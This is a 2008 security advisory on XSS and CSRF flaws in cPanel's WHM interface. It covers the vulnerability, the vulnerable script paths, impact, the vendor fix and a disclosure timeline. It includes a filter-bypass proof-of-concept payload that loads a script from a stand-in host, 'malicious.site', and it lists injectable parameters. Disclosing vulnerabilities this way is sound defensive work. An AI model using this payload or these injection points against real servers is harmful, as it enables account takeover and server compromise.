1. DESCRIPTION OF THE SOFTWARE cPanel is a hosting automation tool. WHM interface provides access to the heart of the cPanel and WHM package and allows a Server Administrator to simply configure a few options and be on their way to hosting web sites. 2. DESCRIPTION OF THE VULNERABILITY There are XSS (identified by CVE-2008-2070) and CSRF (identified by CVE-2008-2071) vulnerabilities on cPanel software. On WHM there is a simple pattern for XSS defense, but this function is not well implemented so it's possible to bypass it using a simple cheat. This is a simple proof of concept: >><<<<<<<<<<<<script src="http://malicious.site/code.js" a=>>>>>>>>< In this way the function don't sanitize the string so it's possible to inject arbitrary JavaScript/HTML code. WHM provide, to the administrator or reseller, all function for manage the server via Web interface but don't protect them against Cross Request Forgery (CSRF). To exploit this vulnerability is not necessary to inject any kind of code to the victim. XSS and CSRF flaw is more simple to exploit with cPanel XMLAPI [1] that use Authentication Basic of WHM (This API works on the same domain and port of WHM). 3. ANALYSIS The XSS flaws are present in any function that manages user input. An example list of vulnerable functions to XSS are: * Knowlege Base (/scripts2/knowlegebase?issue=[INJECTION]&domain=) * Change Ip to domain (/scripts2/changeip?domain=any&user=[INJECTION]) * List user account (/scripts2/listaccts?searchtype=domain&search=[INJECTION]&acctp=30) The list above is not complete. It's possible there are other scripts vulnerable. The CSRF flaw is in all functions that allow to perfom an action (like restart of a service or the entire server) with HTTP method. This vulnerability was tested on WHM 11.15.0 - cPanel 11.18.3-R21703. 4. IMPACT The XSS can be used for create/modify accounts or retrieve important informations about them. With CSRF flaws an attacker can create a new user and gain reseller privilege to it, restart a service, suspend an account, change the password of an account and many other really intersting things. See, for example, "createacct" [2] and "setupreseller" [3] function of cPanel XML API. 5. SOLUTION Vendor released a new version where the XSS flaw is resolved and CSRF mitigated enough to consider it trivial. Update the cPanel to latest release of yours build. All 11.18.4+ and 11.22.3+ builds include the patch. [4] Note that anti-CSRF function use HTTP "Referer" header, please keep in mind is not difficult for an attacker to modify it in various way. 6. TIME LINE 23/03/2008 - Vulnerability discovered 07/04/2008 - cPanel security team contacted 25/04/2008 - cPanel insert patch in all public builds 7. CVE REFERENCE CVE-2008-2070 - XSS CVE-2008-2071 - CSRF 8. REFERENCE [1] http://www.cpanel.net/plugins/xmlapi/ [2] http://www.cpanel.net/plugins/xmlapi/createacct.html [3] http://www.cpanel.net/plugins/xmlapi/setupreseller.html [4] http://changelog.cpanel.net/ -- Matteo Carli